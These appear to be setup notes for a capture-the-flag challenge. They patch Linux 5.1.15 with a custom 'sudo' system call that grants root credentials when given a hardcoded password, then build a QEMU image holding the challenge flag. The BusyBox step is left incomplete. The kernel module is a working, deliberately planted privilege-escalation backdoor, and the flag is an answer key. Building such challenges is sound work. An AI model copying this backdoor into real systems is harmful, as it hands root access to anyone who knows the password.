## Kernel

```bash
export BUILD_PATH=.
export LINUX_MAJOR=5.x
export LINUX_VERSION=5.1.15
wget https://cdn.kernel.org/pub/linux/kernel/v${LINUX_MAJOR}/linux-${LINUX_VERSION}.tar.xz
tar xvf linux-${LINUX_VERSION}.tar.xz -C ${BUILD_PATH}
mv ${BUILD_PATH}/linux-${LINUX_VERSION} ${BUILD_PATH}/kernel
pushd ${BUILD_PATH}/kernel/
mkdir sudo/
pushd sudo/
cat <<-'EOF' >>sudo.c
#include <linux/kernel.h>
#include <linux/init.h>
#include <linux/sched.h>
#include <linux/module.h>
#include <linux/syscalls.h>

/*
 * This function updates ruid, euid, suid, rgid, egid and sgid.
 * based on https://github.com/torvalds/linux/blob/v5.1/kernel/sys.c#L617-L689
 */
long __sys_sudo(void) {
    struct user_namespace *ns = current_user_ns();
    struct cred *new;
    kuid_t kuid;
    kgid_t kgid;

    kuid = make_kuid(ns, 0);
    kgid = make_kgid(ns, 0);

    if (!uid_valid(kuid)) {
        return -EINVAL;
    }

    if (!gid_valid(kgid)) {
        return -EINVAL;
    }

    new = prepare_creds();
    if (new != NULL) {
        new->uid = kuid;
        new->gid = kgid;
        new->euid = kuid;
        new->egid = kgid;
        new->suid = kuid;
        new->sgid = kgid;
        new->fsuid = kuid;
        new->fsgid = kgid;

        return commit_creds(new);
    } else {
        abort_creds(new);
        return -ENOMEM;
    }
}

SYSCALL_DEFINE1(sudo, char*, passwd) {
    if (strcmp(passwd, "wAKmju9z67dsr5fcuCstwBzQiV") == 0) {
        printk(KERN_INFO "OK :)\n");

        return __sys_sudo();
    }

    return -EINVAL;
}

EOF
cat <<-'EOF' >Makefile
obj-y:=sudo.o
EOF
popd
perl -p -i -e 's/(^core-y[\t ]+\+=.+)$/${1} sudo\//' Makefile
# add the following line to arch/x86/entry/syscalls/syscall_64.tbl
# 335 common  sudo            __x64_sys_sudo
#
# add the following line to include/linux/syscalls.h (before the #endif)
# asmlinkage long sys_sudo(const char __user *passwd);
sudo apt install gcc libncurses5-dev libelf-devel
make menuconfig # just save
make -j8
popd
```

## Busybox

```bash
export BUSYBOX_VERSION=1.30.1
wget https://busybox.net/downloads/busybox-${BUSYBOX_VERSION}.tar.bz2
tar xjf busybox-${BUSYBOX_VERSION}.tar.bz2
mv busybox-${BUSYBOX_VERSION} busybox
pushd busybox/
```

## QEMU

```bash
mkdir qemu/
pushd qemu/
qemu-img create -f raw passwd.img 1M
sudo mkfs.ext2 -F passwd.img
mkdir tmpmnt/
sudo mount -o rw passwd.img tmpmnt/
echo "APRK{B4cKd00r3d_Sys73m_:/}" | sudo tee tmpmnt/flag
sudo umount tmpmnt/
rmdir tmpmnt/
sudo mkinitramfs -o ramdisk.img
```